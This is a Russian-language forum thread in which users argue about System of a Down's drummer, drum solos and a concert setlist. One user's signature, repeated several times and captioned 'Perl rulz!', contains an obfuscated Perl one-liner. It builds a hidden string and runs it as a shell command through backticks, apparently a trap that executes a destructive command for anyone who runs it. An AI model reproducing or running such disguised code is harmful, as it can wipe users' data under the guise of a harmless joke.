6ATbKA
разве он не со стен начал? _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
Добавлено: Чт Июл 10, 2008 11:20 am Заголовок сообщения:
ALuserX писал(а):
ты вот видел драм-соло долмояна? нет? а как ты думаешь почему? ну просто человеку это нахуй не сдалось
но если бы он его сделал оно бы было техничнее и выебистее тупого рубилова джордисона
по моему он однажды перед песней квэшанс пытался что то ролдить но это было не так круто как нежели когда джои привязывали к креслу и крутили вокруг своей оси и дарон такой тип вооо это было сыло от джона и они начали исполнять квэшанс _________________ Верю в систему
ты вот видел драм-соло долмояна? нет? а как ты думаешь почему? ну просто человеку это нахуй не сдалось
но если бы он его сделал оно бы было техничнее и выебистее тупого рубилова джордисона
по моему он однажды перед песней квэшанс пытался что то ролдить но это было не так круто как нежели когда джои привязывали к креслу и крутили вокруг своей оси и дарон такой тип вооо это было сыло от джона и они начали исполнять квэшанс
Ещё одна причина записать Джои в позёров, и соло у него было отстойное, подолбил быстро, покрутился, руками помахал. Кароче отстой.
Я смотрел соло Джои там,где его установка поднимается и крутится и мне вообще не понравилось.
Системщик писал(а):
по моему он однажды перед песней квэшанс пытался что то ролдить но это было не так круто как нежели когда джои привязывали к креслу и крутили вокруг своей оси и дарон такой тип вооо это было сыло от джона и они начали исполнять квэшанс
Что за тарабарщина? _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
ну... да.... а ты не знал? _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
6ATbKA
у тебя есть видео всего концерта? или знаешь когото кто записал?
ты не один нас уже четверо как минимум)
еще сбивает с толку то что на фотке где бумажка сетлиста стены только один раз _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
ну так тчо там стены были вторые?)) _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!